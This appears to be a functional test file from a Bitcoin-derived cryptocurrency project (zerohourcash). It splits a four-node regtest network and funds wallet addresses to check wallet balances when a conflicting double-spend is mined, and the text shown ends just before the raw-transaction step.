from contextlib import AsyncExitStack
from datetime import datetime, timezone
from functools import partial
from logging import Logger, getLogger
from traceback import format_exc
from typing import Any, Callable, Dict, Optional, Set
from anyio import create_event, create_task_group, open_cancel_scope, run_sync_in_worker_thread
from anyio.abc import CancelScope, Event, TaskGroup
from ..abc import DataStore, Job
from ..events import EventHub, JobDeadlineMissed, JobFailed, JobSuccessful, JobUpdated
class AsyncWorker(EventHub):
_task_group: Optional[TaskGroup] = None
_stop_event: Optional[Event] = None
_running: bool = False
_running_jobs: int = 0
_acquire_cancel_scope: Optional[CancelScope] = None
def __init__(self, data_store: DataStore, *, max_concurrent_jobs: int = 100,
identity: Optional[str] = None, logger: Optional[Logger] = None,
run_sync_functions_in_event_loop: bool = True):
super().__init__()
self.data_store = data_store
self.max_concurrent_jobs = max_concurrent_jobs
self.identity = identity or f'{platform.node()}-{os.getpid()}-{threading.get_ident()}'
self.logger = logger or getLogger(__name__)
self.run_sync_functions_in_event_loop = run_sync_functions_in_event_loop
self._acquired_jobs: Set[Job] = set()
self._exit_stack = AsyncExitStack()
if self.max_concurrent_jobs < 1:
raise ValueError('max_concurrent_jobs must be at least 1')
async def __aenter__(self):
await self._exit_stack.__aenter__()
await self._exit_stack.enter_async_context(self.data_store)
self._task_group = create_task_group()
await self._exit_stack.enter_async_context(self._task_group)
start_event = create_event()
await self._task_group.spawn(self.run, start_event)
await start_event.wait()
return self
async def __aexit__(self, exc_type, exc_val, exc_tb):
await self.stop(force=exc_type is not None)
await self._exit_stack.__aexit__(exc_type, exc_val, exc_tb)
async def run(self, start_event: Optional[Event] = None) -> None:
self._stop_event = create_event()
self._running = True
if start_event:
await start_event.set()
while self._running:
limit = self.max_concurrent_jobs - self._running_jobs
jobs = []
async with open_cancel_scope() as self._acquire_cancel_scope:
try:
jobs = await self.data_store.acquire_jobs(self.identity, limit)
finally:
del self._acquire_cancel_scope
for job in jobs:
await self._task_group.spawn(self._run_job, job)
await self._stop_event.set()
del self._stop_event
del self._task_group
async def _run_job(self, job: Job) -> None:
now = datetime.now(timezone.utc)
if job.start_deadline is not None:
if now.timestamp() > job.start_deadline.timestamp():
self.logger.info('Missed the deadline of job %r', job.id)
event = JobDeadlineMissed(
now, job_id=job.id, task_id=job.task_id, schedule_id=job.schedule_id,
scheduled_fire_time=job.scheduled_fire_time, start_time=now,
start_deadline=job.start_deadline
)
await self.publish(event)
return
self.logger.info('Started job %r', job.id)
job.started_at = now
event = JobUpdated(
timestamp=now, job_id=job.id, task_id=job.task_id, schedule_id=job.schedule_id
)
await self.publish(event)
self._running_jobs += 1
try:
return_value = await self._call_job_func(job.func, job.args, job.kwargs)
except BaseException as exc:
self.logger.exception('Job %r raised an exception', job.id)
event = JobFailed(
timestamp=datetime.now(timezone.utc), job_id=job.id, task_id=job.task_id,
schedule_id=job.schedule_id, scheduled_fire_time=job.scheduled_fire_time,
start_time=now, start_deadline=job.start_deadline,
traceback=format_exc(), exception=exc
)
else:
self.logger.info('Job %r completed successfully', job.id)
event = JobSuccessful(
timestamp=datetime.now(timezone.utc), job_id=job.id, task_id=job.task_id,
schedule_id=job.schedule_id, scheduled_fire_time=job.scheduled_fire_time,
start_time=now, start_deadline=job.start_deadline, return_value=return_value
)
self._running_jobs -= 1
await self.data_store.release_jobs(self.identity, [job])
await self.publish(event)
async def _call_job_func(self, func: Callable, args: tuple, kwargs: Dict[str, Any]):
if not self.run_sync_functions_in_event_loop and not iscoroutinefunction(func):
wrapped = partial(func, *args, **kwargs)
return await run_sync_in_worker_thread(wrapped)
return_value = func(*args, **kwargs)
if isinstance(return_value, Coroutine):
return_value = await return_value
return return_value
async def stop(self, force: bool = False) -> None:
self._running = False
if self._acquire_cancel_scope:
await self._acquire_cancel_scope.cancel()
if force and self._task_group:
await self._task_group.cancel_scope.cancel()
async def wait_until_stopped(self) -> None:
if self._stop_event:
await self._stop_event.wait()
| true | true |
79010e42d0884bf73de8caa78804f0cf9c24b92a | 3,453 | py | Python | tess/utilities/image_process.py | tonthatnam/japanese_ocr | c78ed95d940fd979bbec1f33bca085e9977cafa4 | [
"MIT"
] | 3 | 2021-02-27T16:13:44.000Z | 2021-05-21T14:08:19.000Z | tess/utilities/image_process.py | tonthatnam/japanese_ocr | c78ed95d940fd979bbec1f33bca085e9977cafa4 | [
"MIT"
] | null | null | null | tess/utilities/image_process.py | tonthatnam/japanese_ocr | c78ed95d940fd979bbec1f33bca085e9977cafa4 | [
"MIT"
] | 1 | 2021-04-03T04:01:57.000Z | 2021-04-03T04:01:57.000Z | from PIL import Image
import tempfile
import cv2
import imutils
import numpy as np
def set_image_dpi_ppi(file_path):
    """Resize the image at *file_path* to 600 px wide (aspect ratio kept)
    and save it as a temporary PNG tagged with 800 DPI.

    :param file_path: path of the source image
    :return: path of the temporary PNG; the caller must delete it
    """
    im = Image.open(file_path)
    length_x, width_y = im.size
    factor = float(length_x / width_y)
    size = int(600), int(600 / factor)
    # Image.ANTIALIAS was removed in Pillow 10; LANCZOS is the same filter.
    im_resized = im.resize(size, Image.LANCZOS)
    temp_file = tempfile.NamedTemporaryFile(delete=False, suffix='.png')
    temp_filename = temp_file.name
    # Close the handle before re-saving: NamedTemporaryFile keeps it open,
    # which leaks a descriptor and breaks re-opening the path on Windows.
    temp_file.close()
    im_resized.save(temp_filename, dpi=(800, 800))
    return temp_filename
def set_text_region(file_path):
    """Detect candidate horizontal text regions in an image.

    Uses a horizontal Sobel gradient, Otsu binarization and wide
    morphological dilate/erode passes to merge character strokes into
    line-shaped blobs, then keeps large, wide contours.

    :param file_path: path of the source image
    :return: ``(img, region)`` — the loaded BGR image and a list of
        4-point boxes (np.int0 arrays) around detected text lines
    """
    img = cv2.imread(file_path)
    img_height = img.shape[0]
    img_width = img.shape[1]
    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
    # Horizontal gradient highlights vertical character strokes.
    sobel = cv2.Sobel(gray, cv2.CV_8U, 1, 0, ksize=3)
    _, binary = cv2.threshold(sobel, 0, 255, cv2.THRESH_OTSU + cv2.THRESH_BINARY)
    # Wide kernels so morphology merges glyphs along a text line.
    element1 = cv2.getStructuringElement(cv2.MORPH_RECT, (int(img_width / 2), 5))
    element2 = cv2.getStructuringElement(cv2.MORPH_RECT, (int(img_width / 3), 2))
    dilation = cv2.dilate(binary, element2, iterations=1)
    erosion = cv2.erode(dilation, element1, iterations=1)
    dilation2 = cv2.dilate(erosion, element2, iterations=2)
    region = []
    contours, hierarchy = cv2.findContours(dilation2, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
    for cnt in contours:
        area = cv2.contourArea(cnt)
        # Keep only contours covering at least 1/6 of the image area.
        if area < img_height * img_width / 6:
            continue
        rect = cv2.minAreaRect(cnt)
        box = np.int0(cv2.boxPoints(rect))
        # Bug fix: use box-local names here. The original reassigned
        # ``height``/``width`` (the image dimensions), so the area filter
        # above compared against the previous box's size from the second
        # iteration onward.
        box_height = abs(box[0][1] - box[2][1])
        box_width = abs(box[0][0] - box[2][0])
        # Discard tall, narrow blobs — text lines are wider than tall.
        if box_height > box_width * 1.3:
            continue
        region.append(box)
    return img, region
def set_sign_board_region(file_path):
    """Locate large rectangular sign-board candidates in an image.

    Thresholds an edge-preserving blur of the grayscale image, then keeps
    contours whose polygonal approximation covers at least a third of the
    image area.

    :param file_path: path of the source image
    :return: ``(output, region)`` — a copy of the image with green
        rectangles drawn on it, and a list of ``(x1, y1, x2, y2)`` boxes
    """
    image = cv2.imread(file_path)
    height, width = image.shape[0], image.shape[1]
    gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
    blurred = cv2.bilateralFilter(gray, 25, 15, 15)
    thresh = cv2.threshold(blurred, 90, 255, cv2.THRESH_BINARY)[1]
    output = image.copy()
    cnts = imutils.grab_contours(
        cv2.findContours(thresh.copy(), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
    )
    region = []
    min_area = int(height * width / 3)
    for contour in cnts:
        # Simplify the contour to a coarse polygon before measuring it.
        epsilon = 0.02 * cv2.arcLength(contour, True)
        approx = cv2.approxPolyDP(contour, epsilon, True)
        if cv2.contourArea(approx) < min_area:
            continue
        x, y, w, h = cv2.boundingRect(approx)
        cv2.rectangle(output, (x, y), (x + w, y + h), (0, 255, 0), 2)
        region.append((x, y, x + w, y + h))
    return output, region
def add_margin(file_path, top, right, bottom, left, color):
    """Pad the image at *file_path* with solid-color margins.

    :param top/right/bottom/left: margin sizes in pixels
    :param color: fill color for the new border area
    :return: path of a temporary 800-DPI PNG holding the padded image;
        the caller must delete it
    """
    image = Image.open(file_path)
    width, height = image.size
    padded = Image.new(
        image.mode, (width + right + left, height + top + bottom), color
    )
    padded.paste(image, (left, top))
    temp_file = tempfile.NamedTemporaryFile(delete=False, suffix='.png')
    temp_filename = temp_file.name
    padded.save(temp_filename, dpi=(800, 800))
    return temp_filename
def process_text(file_path):
    """Binarize an image for OCR.

    Converts to grayscale, applies an edge-preserving bilateral blur and
    a fixed binary threshold at 60, then writes the result to a temporary
    PNG.

    :param file_path: path of the source image
    :return: path of the temporary PNG; the caller must delete it
    """
    image = cv2.imread(file_path)
    gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
    smoothed = cv2.bilateralFilter(gray, 25, 15, 15)
    binary = cv2.threshold(smoothed, 60, 255, cv2.THRESH_BINARY)[1]
    temp_file = tempfile.NamedTemporaryFile(delete=False, suffix='.png')
    temp_filename = temp_file.name
    cv2.imwrite(temp_filename, binary)
    return temp_filename
| 36.347368 | 93 | 0.663481 | from PIL import Image
import tempfile
import cv2
import imutils
import numpy as np
def set_image_dpi_ppi(file_path):
im = Image.open(file_path)
length_x, width_y = im.size
factor = float(length_x/width_y)
size = int(600), int(600/factor)
im_resized = im.resize(size, Image.ANTIALIAS)
temp_file = tempfile.NamedTemporaryFile(delete=False, suffix='.png')
temp_filename = temp_file.name
im_resized.save(temp_filename, dpi=(800, 800))
return temp_filename
def set_text_region(file_path):
img = cv2.imread(file_path)
height = img.shape[0]
width = img.shape[1]
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
sobel = cv2.Sobel(gray, cv2.CV_8U, 1, 0, ksize=3)
ret, binary = cv2.threshold(sobel, 0, 255, cv2.THRESH_OTSU + cv2.THRESH_BINARY)
element1 = cv2.getStructuringElement(cv2.MORPH_RECT, (int(width/2), 5))
element2 = cv2.getStructuringElement(cv2.MORPH_RECT, (int(width/3), 2))
dilation = cv2.dilate(binary, element2, iterations=1)
erosion = cv2.erode(dilation, element1, iterations=1)
dilation2 = cv2.dilate(erosion, element2, iterations=2)
region = []
contours, hierarchy = cv2.findContours(dilation2, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
for i in range(len(contours)):
cnt = contours[i]
area = cv2.contourArea(cnt)
if (area < height*width/6):
continue
rect = cv2.minAreaRect(cnt)
box = cv2.boxPoints(rect)
box = np.int0(box)
height = abs(box[0][1] - box[2][1])
width = abs(box[0][0] - box[2][0])
if (height > width * 1.3):
continue
region.append(box)
return img, region
def set_sign_board_region(file_path):
image = cv2.imread(file_path)
height = image.shape[0]
width = image.shape[1]
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
blurred = cv2.bilateralFilter(gray, 25, 15, 15)
thresh = cv2.threshold(blurred, 90, 255, cv2.THRESH_BINARY)[1]
output = image.copy()
cnts = cv2.findContours(thresh.copy(), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
cnts = imutils.grab_contours(cnts)
region = []
for c in cnts:
epsilon = 0.02 * cv2.arcLength(c, True)
c = cv2.approxPolyDP(c, epsilon, True)
area = cv2.contourArea(c)
if area < int(height*width/3):
continue
x,y,w,h = cv2.boundingRect(c)
cv2.rectangle(output,(x,y),(x+w,y+h),(0,255,0),2)
region.append((x,y,x+w,y+h))
return output, region
def add_margin(file_path, top, right, bottom, left, color):
image = Image.open(file_path)
width, height = image.size
new_width = width + right + left
new_height = height + top + bottom
result = Image.new(image.mode, (new_width, new_height), color)
result.paste(image, (left, top))
temp_file = tempfile.NamedTemporaryFile(delete=False, suffix='.png')
temp_filename = temp_file.name
result.save(temp_filename, dpi=(800, 800))
return temp_filename
def process_text(file_path):
image = cv2.imread(file_path)
height = image.shape[0]
width = image.shape[1]
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
blurred = cv2.bilateralFilter(gray, 25, 15, 15)
thresh = cv2.threshold(blurred, 60, 255, cv2.THRESH_BINARY)[1]
temp_file = tempfile.NamedTemporaryFile(delete=False, suffix='.png')
temp_filename = temp_file.name
cv2.imwrite(temp_filename, thresh)
return temp_filename
| true | true |
79010e95ff3c3d69ff6163190fe385046a30dd10 | 8,628 | py | Python | couler/core/step_update_utils.py | javoweb/couler | 1531f31816a1505401c5326dc5fec5a8bb7bf7cd | [
"Apache-2.0"
] | null | null | null | couler/core/step_update_utils.py | javoweb/couler | 1531f31816a1505401c5326dc5fec5a8bb7bf7cd | [
"Apache-2.0"
] | null | null | null | couler/core/step_update_utils.py | javoweb/couler | 1531f31816a1505401c5326dc5fec5a8bb7bf7cd | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 The Couler Authors. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import OrderedDict
import couler.core.templates.output
from couler.core import states, utils
from couler.core.templates import OutputArtifact, Step
def update_step(func_name, args, step_name, caller_line):
    """Record one function invocation in the workflow being built.

    Dispatches to DAG-task bookkeeping when the workflow runs in DAG mode,
    otherwise to step bookkeeping (with special handling while a
    run-concurrent block is open).

    :return: the name assigned to the recorded task/step
    """
    if states.workflow.dag_mode_enabled():
        task_name = _update_dag_tasks(
            func_name,
            states._dag_caller_line,
            states._upstream_dag_task,
            states._upstream_dag_depends_logic,
            args,
            step_name=step_name,
        )
        # The new task becomes the upstream dependency for what follows.
        states._upstream_dag_task = [task_name]
        return task_name

    if states._run_concurrent_lock:
        return _update_steps(
            "concurrent_func_name",
            states._concurrent_func_line,
            args,
            func_name,
        )
    return _update_steps(func_name, caller_line, args)
def _update_dag_tasks(
    function_name,
    caller_line,
    dependencies,
    depends_logic,
    args=None,
    template_name=None,
    step_name=None,
):
    """
    A task in DAG of Argo YAML contains name, related template and parameters.
    Here we insert a single task into the global tasks.

    :param function_name: name of the invoked function; also the template
        name unless *template_name* overrides it
    :param caller_line: caller line number, used to derive a unique task id
        when *step_name* is not given
    :param dependencies: upstream task names (list) for the ``dependencies``
        field
    :param depends_logic: expression for Argo's ``depends`` field
    :param args: call arguments, translated to parameters/artifacts
    :return: the task name (id) used in the DAG
    """
    if step_name is None:
        function_id = utils.invocation_name(function_name, caller_line)
    else:
        function_id = step_name

    task_template = states.workflow.get_dag_task(function_id)
    if task_template is None:
        # First time this task is seen: build its full template.
        task_template = OrderedDict({"name": function_id})
        if dependencies is not None and isinstance(dependencies, list):
            if "dependencies" in task_template:
                task_template["dependencies"].extend(dependencies)
            else:
                task_template["dependencies"] = dependencies
        if depends_logic is not None:
            task_template["depends"] = depends_logic
        if template_name is None:
            task_template["template"] = function_name
        else:
            task_template["template"] = template_name
        # configure the args
        if args is not None:
            parameters, artifacts = _get_params_and_artifacts_from_args(
                args, function_name, prefix="tasks"
            )
            if len(parameters) > 0:
                task_template["arguments"] = OrderedDict()
                task_template["arguments"]["parameters"] = parameters
            if len(artifacts) > 0:
                if "arguments" not in task_template:
                    task_template["arguments"] = OrderedDict()
                task_template["arguments"]["artifacts"] = artifacts
    else:
        # step exist on the dag, thus, we update its dependency
        # NOTE(review): this branch wraps *dependencies* in a list while the
        # branch above assigns it as-is — if callers always pass a list this
        # nests it; confirm intended.
        if dependencies is not None:
            if "dependencies" in task_template:
                task_template["dependencies"].extend(dependencies)
            else:
                task_template["dependencies"] = [dependencies]
        if depends_logic is not None:
            task_template["depends"] = depends_logic

    t_name = function_name if template_name is None else template_name
    step = Step(name=function_id, template=t_name)
    if states._exit_handler_enable:
        # Inside an exit handler: record the step there instead of the DAG.
        if states._when_prefix is not None:
            step.when = states._when_prefix
        if function_id in states.workflow.exit_handler_step:
            states.workflow.exit_handler_step.get(function_id).append(
                step.to_dict()
            )
        else:
            states.workflow.exit_handler_step[function_id] = [step.to_dict()]
    elif states._when_prefix is not None:
        # Conditional task: guard it and depend on the condition task.
        step.when = states._when_prefix
        if step.name not in states.workflow.dag_tasks.keys():
            step_spec = step.to_dict()
            step_spec["dependencies"] = [states._when_task]
            states.workflow.dag_tasks[step.name] = step_spec
    else:
        states.workflow.update_dag_task(function_id, task_template)
    # return the current task name
    return function_id
def _update_steps(function_name, caller_line, args=None, template_name=None):
    """
    A step in Argo YAML contains name, related template and parameters.
    Here we insert a single step into the global steps.

    :param function_name: invoked function; used for the step id and (when
        *template_name* is None) as the template name
    :param caller_line: caller line number, used to derive a unique step id
    :param args: call arguments, translated to parameters/artifacts
    :param template_name: template override used in run-concurrent mode
    :return: the recorded step name, or the bare function id when step
        recording is disabled (``_update_steps_lock`` is False)
    """
    function_id = utils.invocation_name(function_name, caller_line)
    # Update `steps` only if needed
    if states._update_steps_lock:
        name = function_id
        if states._run_concurrent_lock:
            # Concurrent invocations of the same template get a numeric
            # suffix so their step names stay unique.
            _id = utils.invocation_name(template_name, caller_line)
            name = "%s-%s" % (_id, states._concurrent_func_id)
            if states._sub_steps is not None:
                states._concurrent_func_id = states._concurrent_func_id + 1
        t_name = function_name if template_name is None else template_name
        step = Step(name=name, template=t_name)
        if states._when_prefix is not None:
            step.when = states._when_prefix
        if args is not None:
            parameters, artifacts = _get_params_and_artifacts_from_args(
                args,
                template_name
                if states._run_concurrent_lock
                else function_name,
                prefix="steps",
            )
            if len(parameters) > 0:
                step.arguments = OrderedDict()
                step.arguments["parameters"] = parameters
            if len(artifacts) > 0:
                if step.arguments is None:
                    step.arguments = OrderedDict()
                step.arguments["artifacts"] = artifacts
        # Inside a condition block the step is filed under the condition id.
        if states._condition_id is not None:
            function_id = states._condition_id
        if states._while_lock:
            # Steps inside a while-loop body accumulate separately.
            if function_id in states._while_steps:
                states._while_steps.get(function_id).append(step.to_dict())
            else:
                states._while_steps[function_id] = [step.to_dict()]
        else:
            if states._sub_steps is not None:
                if function_id in states._sub_steps:
                    states._sub_steps.get(function_id).append(step.to_dict())
                else:
                    states._sub_steps[function_id] = [step.to_dict()]
            elif states._exit_handler_enable is True:
                if function_id in states.workflow.exit_handler_step:
                    states.workflow.exit_handler_step.get(function_id).append(
                        step.to_dict()
                    )
                else:
                    states.workflow.exit_handler_step[function_id] = [
                        step.to_dict()
                    ]
            else:
                states.workflow.add_step(function_id, step)
        return step.name
    else:
        return function_id
def _get_params_and_artifacts_from_args(args, input_param_name, prefix):
    """Translate call arguments into Argo parameter and artifact dicts.

    :param args: a single argument or a list of arguments; each is resolved
        through ``parse_argo_output`` to an Argo reference or plain value
    :param input_param_name: base name used to derive the numbered input
        parameter names (``para-<name>-<i>``-style, via
        ``utils.input_parameter_name``)
    :param prefix: "steps" or "tasks", selecting the Argo reference style
    :return: ``(parameters, artifacts)`` lists ready to embed under
        ``arguments`` in a step/task template
    """
    parameters = []
    artifacts = []
    if not isinstance(args, list):
        args = [args]
    i = 0
    for arg in args:
        values = couler.core.templates.output.parse_argo_output(arg, prefix)
        if isinstance(values, list):
            # Multi-output argument: one numbered parameter per value.
            for value in values:
                parameters.append(
                    {
                        "name": utils.input_parameter_name(
                            input_param_name, i
                        ),
                        "value": value,
                    }
                )
                i += 1
        else:
            if isinstance(arg, OutputArtifact):
                # Artifacts are passed by reference and deduplicated on
                # their "from" source; they do not consume a parameter index.
                artifact_dict = {
                    "name": ".".join(arg.value.split(".")[5:]),
                    "from": values,
                }
                if not any(
                    [artifact_dict["from"] == x["from"] for x in artifacts]
                ):
                    artifacts.append(artifact_dict)
            else:
                parameters.append(
                    {
                        "name": utils.input_parameter_name(
                            input_param_name, i
                        ),
                        "value": values,
                    }
                )
                i += 1
    return parameters, artifacts
| 35.506173 | 78 | 0.585883 |
from collections import OrderedDict
import couler.core.templates.output
from couler.core import states, utils
from couler.core.templates import OutputArtifact, Step
def update_step(func_name, args, step_name, caller_line):
if states.workflow.dag_mode_enabled():
step_name = _update_dag_tasks(
func_name,
states._dag_caller_line,
states._upstream_dag_task,
states._upstream_dag_depends_logic,
args,
step_name=step_name,
)
states._upstream_dag_task = [step_name]
else:
if states._run_concurrent_lock:
step_name = _update_steps(
"concurrent_func_name",
states._concurrent_func_line,
args,
func_name,
)
else:
step_name = _update_steps(func_name, caller_line, args)
return step_name
def _update_dag_tasks(
function_name,
caller_line,
dependencies,
depends_logic,
args=None,
template_name=None,
step_name=None,
):
if step_name is None:
function_id = utils.invocation_name(function_name, caller_line)
else:
function_id = step_name
task_template = states.workflow.get_dag_task(function_id)
if task_template is None:
task_template = OrderedDict({"name": function_id})
if dependencies is not None and isinstance(dependencies, list):
if "dependencies" in task_template:
task_template["dependencies"].extend(dependencies)
else:
task_template["dependencies"] = dependencies
if depends_logic is not None:
task_template["depends"] = depends_logic
if template_name is None:
task_template["template"] = function_name
else:
task_template["template"] = template_name
if args is not None:
parameters, artifacts = _get_params_and_artifacts_from_args(
args, function_name, prefix="tasks"
)
if len(parameters) > 0:
task_template["arguments"] = OrderedDict()
task_template["arguments"]["parameters"] = parameters
if len(artifacts) > 0:
if "arguments" not in task_template:
task_template["arguments"] = OrderedDict()
task_template["arguments"]["artifacts"] = artifacts
else:
if dependencies is not None:
if "dependencies" in task_template:
task_template["dependencies"].extend(dependencies)
else:
task_template["dependencies"] = [dependencies]
if depends_logic is not None:
task_template["depends"] = depends_logic
t_name = function_name if template_name is None else template_name
step = Step(name=function_id, template=t_name)
if states._exit_handler_enable:
if states._when_prefix is not None:
step.when = states._when_prefix
if function_id in states.workflow.exit_handler_step:
states.workflow.exit_handler_step.get(function_id).append(
step.to_dict()
)
else:
states.workflow.exit_handler_step[function_id] = [step.to_dict()]
elif states._when_prefix is not None:
step.when = states._when_prefix
if step.name not in states.workflow.dag_tasks.keys():
step_spec = step.to_dict()
step_spec["dependencies"] = [states._when_task]
states.workflow.dag_tasks[step.name] = step_spec
else:
states.workflow.update_dag_task(function_id, task_template)
return function_id
def _update_steps(function_name, caller_line, args=None, template_name=None):
    """Record an invocation of `function_name` as an Argo workflow step.

    Args:
        function_name: name of the templated function being invoked.
        caller_line: line number of the invocation site; combined with the
            function name via `utils.invocation_name` to derive a unique id.
        args: optional call arguments, converted into the step's input
            parameters/artifacts via `_get_params_and_artifacts_from_args`.
        template_name: when set, the step references this template instead
            of `function_name` (e.g. inside run_concurrent).

    Returns:
        The generated step name when a step was recorded, otherwise the
        bare invocation id.
    """
    function_id = utils.invocation_name(function_name, caller_line)
    # NOTE(review): states._update_steps_lock appears to gate whether the
    # invocation is materialized as a step at all; when unset only the
    # invocation id is returned -- confirm against couler.core.states.
    if states._update_steps_lock:
        name = function_id
        if states._run_concurrent_lock:
            # Inside run_concurrent: suffix the template invocation id with
            # a per-call counter so concurrent steps get distinct names.
            _id = utils.invocation_name(template_name, caller_line)
            name = "%s-%s" % (_id, states._concurrent_func_id)
            if states._sub_steps is not None:
                states._concurrent_func_id = states._concurrent_func_id + 1
        t_name = function_name if template_name is None else template_name
        step = Step(name=name, template=t_name)
        # Propagate a pending `when` condition onto the step, if any.
        if states._when_prefix is not None:
            step.when = states._when_prefix
        if args is not None:
            # Under run_concurrent the referenced template owns the input
            # parameter names, so derive them from template_name instead.
            parameters, artifacts = _get_params_and_artifacts_from_args(
                args,
                template_name
                if states._run_concurrent_lock
                else function_name,
                prefix="steps",
            )
            if len(parameters) > 0:
                step.arguments = OrderedDict()
                step.arguments["parameters"] = parameters
            if len(artifacts) > 0:
                if step.arguments is None:
                    step.arguments = OrderedDict()
                step.arguments["artifacts"] = artifacts
        # Steps created under an active condition are grouped under the
        # condition's id rather than their own invocation id.
        if states._condition_id is not None:
            function_id = states._condition_id
        # Route the rendered step into exactly one collection, in priority
        # order: while-loop body, sub-steps, exit handler, main workflow.
        if states._while_lock:
            if function_id in states._while_steps:
                states._while_steps.get(function_id).append(step.to_dict())
            else:
                states._while_steps[function_id] = [step.to_dict()]
        else:
            if states._sub_steps is not None:
                if function_id in states._sub_steps:
                    states._sub_steps.get(function_id).append(step.to_dict())
                else:
                    states._sub_steps[function_id] = [step.to_dict()]
            elif states._exit_handler_enable is True:
                if function_id in states.workflow.exit_handler_step:
                    states.workflow.exit_handler_step.get(function_id).append(
                        step.to_dict()
                    )
                else:
                    states.workflow.exit_handler_step[function_id] = [
                        step.to_dict()
                    ]
            else:
                states.workflow.add_step(function_id, step)
        return step.name
    else:
        return function_id
def _get_params_and_artifacts_from_args(args, input_param_name, prefix):
    """Convert call arguments into Argo input parameter and artifact specs.

    Args:
        args: a single argument or a list of arguments; each is resolved
            through `couler.core.templates.output.parse_argo_output`.
        input_param_name: base name used to derive per-position input
            parameter names via `utils.input_parameter_name`.
        prefix: Argo reference prefix ("steps" or "tasks") forwarded to
            `parse_argo_output`.

    Returns:
        A `(parameters, artifacts)` pair of lists of dicts ready to be
        embedded in a step/task's "arguments" section.
    """
    parameters = []
    artifacts = []
    if not isinstance(args, list):
        args = [args]
    # `i` numbers the generated input *parameters*: it advances once per
    # value for list-valued outputs and once per scalar argument; artifacts
    # share the per-argument increment of the scalar branch.
    i = 0
    for arg in args:
        values = couler.core.templates.output.parse_argo_output(arg, prefix)
        if isinstance(values, list):
            # A list of outputs expands into one input parameter per value.
            for value in values:
                parameters.append(
                    {
                        "name": utils.input_parameter_name(
                            input_param_name, i
                        ),
                        "value": value,
                    }
                )
                i += 1
        else:
            if isinstance(arg, OutputArtifact):
                artifact_dict = {
                    "name": ".".join(arg.value.split(".")[5:]),
                    "from": values,
                }
                # De-duplicate artifacts that reference the same source.
                if not any(
                    artifact_dict["from"] == x["from"] for x in artifacts
                ):
                    artifacts.append(artifact_dict)
            else:
                parameters.append(
                    {
                        "name": utils.input_parameter_name(
                            input_param_name, i
                        ),
                        "value": values,
                    }
                )
            i += 1
    return parameters, artifacts
| true | true |
79010efc28d2a0d4cf031086c42489b79a2cf15b | 6,973 | py | Python | test/functional/wallet_txn_doublespend.py | zerohourcash/zerohourcash | 2e3be4876e1775e8532b71ecb29c502e6c02616a | [
"MIT"
] | 5 | 2021-04-26T01:15:43.000Z | 2022-02-28T19:48:24.000Z | test/functional/wallet_txn_doublespend.py | zerohourcash/zerohourcash | 2e3be4876e1775e8532b71ecb29c502e6c02616a | [
"MIT"
] | null | null | null | test/functional/wallet_txn_doublespend.py | zerohourcash/zerohourcash | 2e3be4876e1775e8532b71ecb29c502e6c02616a | [
"MIT"
] | 3 | 2021-04-26T00:57:46.000Z | 2022-01-13T07:37:51.000Z | #!/usr/bin/env python3
# Copyright (c) 2014-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the wallet accounts properly when there is a double-spend conflict."""
from decimal import Decimal
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
from test_framework.zerohourconfig import INITIAL_BLOCK_REWARD
class TxnMallTest(BitcoinTestFramework):
    """Check wallet accounting when a mined double-spend conflicts with
    two wallet transactions.

    The network starts split into {0, 1} and {2, 3}.  Node 0 broadcasts two
    normal payments on its side while a conflicting raw transaction spending
    the same inputs is mined on the other side; after reconnecting, the
    normal payments must show as conflicted and balances must follow the
    mined double-spend.
    """
    def set_test_params(self):
        # Two pairs of nodes so the network can be split into halves.
        self.num_nodes = 4
    def skip_test_if_missing_module(self):
        self.skip_if_no_wallet()
    def add_options(self, parser):
        parser.add_argument("--mineblock", dest="mine_block", default=False, action="store_true",
                            help="Test double-spend of 1-confirmed transaction")
    def setup_network(self):
        # Start with split network: disconnect {0, 1} from {2, 3}.
        super().setup_network()
        disconnect_nodes(self.nodes[1], 2)
        disconnect_nodes(self.nodes[2], 1)
    def run_test(self):
        # All nodes should start with 25 matured block rewards:
        starting_balance = 25*INITIAL_BLOCK_REWARD
        # All nodes should be out of IBD.
        # If the nodes are not all out of IBD, that can interfere with
        # blockchain sync later in the test when nodes are connected, due to
        # timing issues.
        for n in self.nodes:
            assert n.getblockchaininfo()["initialblockdownload"] == False
        for i in range(4):
            assert_equal(self.nodes[i].getbalance(), starting_balance)
            self.nodes[i].getnewaddress("") # bug workaround, coins generated assigned to first getnewaddress!
        # Amounts funding the two inputs of the double-spend, and the
        # double-spend output itself (slightly less, leaving change).
        spend_from_foo = starting_balance - INITIAL_BLOCK_REWARD*5
        spend_from_bar = INITIAL_BLOCK_REWARD*5 - 100
        spend_from_doublespend = spend_from_foo + spend_from_bar - 8
        # Assign coins to foo and bar addresses:
        node0_address_foo = self.nodes[0].getnewaddress()
        fund_foo_txid = self.nodes[0].sendtoaddress(node0_address_foo, spend_from_foo)
        fund_foo_tx = self.nodes[0].gettransaction(fund_foo_txid)
        node0_address_bar = self.nodes[0].getnewaddress()
        fund_bar_txid = self.nodes[0].sendtoaddress(node0_address_bar, spend_from_bar)
        fund_bar_tx = self.nodes[0].gettransaction(fund_bar_txid)
        # Self-sends only cost the fees (amounts stay in the wallet).
        assert_equal(self.nodes[0].getbalance(),
                     starting_balance + fund_foo_tx["fee"] + fund_bar_tx["fee"])
        # Coins are sent to node1_address
        node1_address = self.nodes[1].getnewaddress()
        # First: use raw transaction API to send spend_from_doublespend
